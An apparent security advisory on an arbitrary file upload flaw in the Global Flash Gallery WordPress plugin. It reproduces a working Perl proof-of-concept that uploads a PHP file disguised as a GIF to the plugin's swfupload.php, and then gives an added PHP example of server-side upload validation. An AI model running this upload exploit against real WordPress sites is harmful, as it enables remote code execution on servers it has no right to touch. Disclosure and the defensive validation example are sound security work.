source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();
my $req = POST $url,
    Content_Type => 'form-data',
    Content => [
        name => $name,
        galleryselect => 1, # Gallery ID (popup.php)
        Filedata => [ "$file", "file.php.gif", Content_Type =>
            'image/gif' ]
    ];
my $res = $ua->request( $req );
if( $res->is_success ) {
    print $res->content;
} else {
    print $res->status_line, "\n";
}

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
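
A server-side check of the kind whose absence the advisory describes, written in PHP because the affected component is a WordPress plugin. This is an added example, not the plugin's code or its fix; the function name safe_upload_name, the allowlist and the sample files are assumptions made for illustration.

```php
<?php
// Added example (hypothetical helper, not the plugin's code).
// Allowlisted final extensions and the magic bytes each must start with.
const ALLOWED = [
    'gif'  => ["GIF87a", "GIF89a"],
    'png'  => ["\x89PNG\r\n\x1a\n"],
    'jpg'  => ["\xFF\xD8\xFF"],
    'jpeg' => ["\xFF\xD8\xFF"],
];

// Returns a server-generated file name, or null when the upload is rejected.
// The client's file name and Content-Type are attacker-controlled: the name
// only supplies the final extension, the Content-Type is not consulted.
function safe_upload_name(string $clientName, string $tmpPath): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;                      // final extension not allowlisted
    }
    $head = (string) file_get_contents($tmpPath, false, null, 0, 8);
    foreach (ALLOWED[$ext] as $magic) {
        if (strncmp($head, $magic, strlen($magic)) === 0) {
            // Every other segment of the client name is discarded, so a name
            // such as "file.php.gif" cannot leave ".php" in the stored name.
            return bin2hex(random_bytes(16)) . '.' . $ext;
        }
    }
    return null;                          // content does not match extension
}

// Constructed samples: a GIF header and a PHP script, written to temp files.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'constructed sample'; ?>");

foreach ([['photo.gif', $gif], ['file.php.gif', $gif],
          ['file.php.gif', $php], ['file.php', $php]] as [$name, $path]) {
    $stored = safe_upload_name($name, $path);
    printf("%-14s -> %s\n", $name, $stored ?? 'REJECTED');
}
unlink($gif);
unlink($php);
```

A magic-byte prefix can be placed in front of arbitrary content, so the check belongs together with storing uploads in a directory where the web server does not execute scripts.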